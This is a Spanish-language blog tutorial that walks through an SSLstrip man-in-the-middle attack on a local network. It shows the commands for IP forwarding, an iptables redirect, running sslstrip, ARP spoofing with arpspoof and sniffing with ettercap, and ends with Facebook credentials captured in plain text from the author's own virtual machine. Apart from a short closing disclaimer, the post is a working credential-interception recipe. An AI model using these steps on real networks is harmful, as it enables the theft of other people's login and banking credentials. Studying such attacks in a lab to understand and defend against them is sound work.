SSLstrip consiste en hacer creer al usuario que está bajo una conexión segura, ya sea porque el usuario ve un candadito que indica seguridad, sslstrip puede falsificarlo, o por que el usuario no se fija si está bajo tráfico cifrado o no.
Cuando un atacante lanza SSLstrip sobre
una víctima, ésta sigue navegando felizmente por la red. El problema
viene cuando se conecta a una página bajo HTTPS, la víctima puede
observar como el HTTPS ha desaparecido de su navegador, si no se fija en
ese pequeño detalle y se autentifique en algún sitio, sus credenciales
irán en texto plano hacia la víctima.
Ahora vamos a ir a la pagina del autor de esta obra para descargar esta herramienta...=)
Pues es hora de su respectiva descarga :
Ahora nos disponemos a extraer los archivos....=)
~# tar zxvf sslstrip-0.9.tar.gz
Una vez terminado la extracción , si gustamos cerramos la terminal y abrimos otra...=)....Y nos disponemos a ingresar a la carpeta de sslsstrip.
~# cd sslstrip-0.9
Una vez dentro vamos a hacer correr el setup...=)....Esto es opcional....
~# sudo python ./setup.py install
Una vez que termine cerramos la terminal...=)...Y de nuevo abrimos otra..=)
Ahora si viene lo importante...=)...Debemos poner las siguientes lineas para que sea posible el redireccionamiento....En este instante vamos hacer correr el sslstrip...=D
~# echo 1 > /proc/sys/net/ipv4/ip_forward
~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000
~# python sslstrip.py -p -l 1000
Yeahhhhhhhhhh!!!!!!!!!!!!!!!!!!!....Running...=D
Una vez que vemos que esta corriendo correctamente vamos a minimizar la terminal...OJO...No cerrar la terminal.....=)
Una vez mas vamos a la carpeta de sslstrip-0.9, y digitamos lo siguiente..=)
# tail -f sslstrip.log
Bueno creo que es momento de buscar un objetivo, en mi caso sera mi maquina virtual, cuyo sistema operativo es windows 7. Para eso vamos a buscar la Ip de nuestro objetivo...=)
~#ifconfig
OJO.......Tener presente el eth0 , ya que es dinámico...=)
Para conocer la otra ip, vamos a utilizar la gran herramienta de Nmap...=)....para un escaneo de la red...=)
Listoooo!!!!....tenemos las 2 Ips...=)...nuestro objetivo y nuestro host...=D
Una vez mas abrimos una terminal para hacer correr el Arpspoof ...=)
~# arpspoof -i eth0 -t <victima > <gatewayIP>
~# arpspoof -i eth0 -t 192.168.137.1 192.168.137.107
Ahora solo le damos un enter y Listooooooo!!!!!!!!!!!!!
Yeahhhhhhhh!!!!!!!!!!!!!...podemos observar como esta corriendo correctamente..=D
Por ultima vez, vamos a minimizar al terminal y abrir una ultima terminal.
Ahora vamos a necesitar la ayuda de un sniffer...=)...En mi caso he utilizado el Ettercap..=D...pues vamos a activarlo y para poder ver todos los datos en texto plano..=D
~# ettercap -Tq -i eth0
Listoooooooooo!!!!!!!!!!!!!!!!
Ahora me dirigo a mi otra maquina para poder digitar mi acceso a una pagina HTTPS..=)....pues creo que es momento de ver quien me ha inscrito en facebook..xD!!!!!
Ahora me dirigo a mi BackTrack y veo que datos ha capturado el Ettercap...=D
=O....Mi user y mi pass...=D...Listoooooooooo!!!!!!!!!!...Misión cumplida..=D
Bueno cabe resaltar que esto es algo muy peligroso ya sea para las transacciones bancarias u otros casos. Este post tiene el objetivo de mostrar como de sencillo se puede vulnerar el protocolo SSL, no utilizar el conocimiento para cosas que pueden perjudicar a otras personas.....=)
Pues creo que llegamos al final del este post...=)....Me depido y sera hasta otra nueva oportunidad....Nos vemos.....=D
P.D : Agradesco a esa persona que me ayudo en esos momento muy dificiles por los que estaba pasando........Gracias Peque........por esas palabras de apoyo......=D
No hay comentarios:
Publicar un comentario